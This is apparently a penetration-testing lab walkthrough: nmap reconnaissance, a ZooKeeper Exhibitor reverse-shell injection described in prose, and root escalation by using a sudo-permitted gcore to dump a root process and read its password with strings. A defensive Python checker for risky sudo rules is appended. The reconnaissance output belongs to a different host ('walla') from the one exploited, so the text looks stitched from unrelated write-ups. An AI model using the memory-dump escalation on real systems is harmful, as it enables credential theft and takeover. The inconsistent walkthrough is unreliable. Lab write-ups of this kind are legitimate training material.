1. Reconnaissance
We begin with the initial nmap enumeration, using nmapAutomator to run all scan stages against the target:
sudo ./nmapAutomator.sh 192.168.185.97 all
[sudo] password for kali:
Running all scans on 192.168.185.97
Host is likely running Unknown OS!
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Not valid before: 2020-09-17T18:26:36
|_Not valid after: 2030-09-15T18:26:36
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open tcpwrapped
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
422/tcp open ariel3
8091/tcp open jamlink
42042/tcp open unknown
Making a script scan on extra ports: 422, 8091, 42042
PORT STATE SERVICE VERSION
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
8091/tcp open http lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
----------------------Starting UDP Scan------------------------
No UDP ports are open
There aren’t any interesting shared SMB dirves.

We see three web services running on this host: CUPS 2.2 on port 631, Jetty 1.0 on port 8080 and nginx 1.14.2 on port 8081.
2. Enumeration
Visiting the web service on port 8081 redirects us internally to the ZooKeeper control panel running on port 8080 at
http://192.168.245.98:8080/exhibitor/v1/ui/index.html

This version of ZooKeeper (its Exhibitor control panel) has a vulnerability that lets us inject a reverse shell payload as the java.env script arguments; the script is loaded when the ZooKeeper service restarts, so the payload runs at that point.
Refer: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0790
After adding the payload and choosing "commit at once", the service restarts and we receive the reverse shell.

3. Privilege Escalation
With a foothold on the target machine, we upload linpeas and enumerate privilege escalation vectors. A root-owned process named password-store stands out:

charles@pelican:/tmp$ ps -ef | grep "password-store"
root 527 1 0 22:08 ? 00:00:00 /usr/bin/password-store
root 24088 1 0 22:45 ? 00:00:00 /usr/bin/password-store
charles 24409 31105 0 22:46 pts/1 00:00:00 grep password-store
Now that we have the PID of password-store (527), and since sudo lets us run gcore as root, we use gcore to dump the process memory to a file:
charles@pelican:/tmp$ sudo -u root /usr/bin/gcore -a -o /home/charles/output 527
charles@pelican:~$ strings output.527

Running strings on the dump lets us read the process memory, and the root password is visible in it, which gives us root access.
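The escalation above only works because a sudo rule lets an unprivileged user run gcore as root. As an added defensive check (not part of the original writeup), the following Python script parses `sudo -l` output and flags any rule that lets the user run a debugger or tracer as root; the sample output it parses is constructed here, not captured from the target.

```python
import re
from typing import List, Tuple

# Debuggers and tracers that can read another process's memory. A sudo rule that
# lets an unprivileged user run one of these as root lets them dump secrets held
# by root-owned processes, exactly as the gcore step above does.
MEMORY_READERS = {"gcore", "gdb", "gdbserver", "strace", "ltrace", "lldb"}

# One `sudo -l` rule line, e.g. "    (ALL) NOPASSWD: /usr/bin/gcore"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample of `sudo -l` output; hypothetical, not captured from the target.
SAMPLE_SUDO_L = """\
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore
    (root) /usr/bin/systemctl restart zookeeper, /usr/bin/ltrace
    (www-data) /usr/bin/gdb
"""

def parse_sudo_l(output: str) -> List[Tuple[str, str, str]]:
    """Return (runas_user, tags, command) for every rule in `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # rules follow this header, one per line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root : root)" -> "root"
        tags = m.group("tags").strip()
        # several commands in one rule are printed comma-separated on one line
        for cmd in m.group("cmds").split(", "):
            rules.append((runas, tags, cmd.strip()))
    return rules

def memory_dump_findings(output: str) -> List[Tuple[str, str, bool]]:
    """Flag (command, runas, nopasswd) rules that let the user read root memory."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        if runas not in ("ALL", "root"):
            continue                 # running as an unprivileged user is not the issue
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL" or prog in MEMORY_READERS:
            findings.append((cmd, runas, "NOPASSWD:" in tags))
    return findings
```

Any rule the script reports should be removed from sudoers; ptrace restrictions such as yama do not help here because the debugger runs as root.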
